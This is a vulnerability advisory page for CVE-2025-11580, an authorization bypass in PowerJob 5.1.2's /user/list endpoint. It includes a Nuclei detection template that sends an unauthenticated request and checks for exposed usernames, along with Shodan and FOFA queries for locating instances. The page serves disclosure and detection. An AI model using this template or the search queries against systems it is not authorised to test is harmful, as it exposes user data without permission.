CVE-2025-11580: PowerJob List - Authorization Bypass

日期: 2026-01-24 | 影响软件: PowerJob List | POC: 已公开

漏洞描述

PowerJob = 5.1.2 contains a broken access control caused by missing authorization in /user/list function, letting remote attackers access unauthorized resources, exploit requires no special privileges.

PoC代码[已公开]

id: CVE-2025-11580

info:
  name: PowerJob List - Authorization Bypass
  author: DhiyaneshDk
  severity: medium
  description: |
    PowerJob = 5.1.2 contains a broken access control caused by missing authorization in /user/list function, letting remote attackers access unauthorized resources, exploit requires no special privileges.
  impact: |
    Remote attackers can access unauthorized resources, potentially leading to data exposure or privilege escalation.
  remediation: |
    Update to the latest version beyond 5.1.2.
  reference:
    - https://github.com/PowerJob/PowerJob/issues/1127
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11580
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"PowerJob"
    fofa-query: title="PowerJob"
    product: powerjob
    vendor: powerjob
  tags: cve,cve2025,powerjob,auth-bypass,oss

http:
  - raw:
      - |
        GET /user/list HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":true'
          - '"username":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100807b0525e4c82205cd11156995046a97af5244ab3dc7b5aae46bc9742916e4bc02210094b9829d328208daa8e26878b6685f80e10f8c0a974b30b010cffcc0d6389d5c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐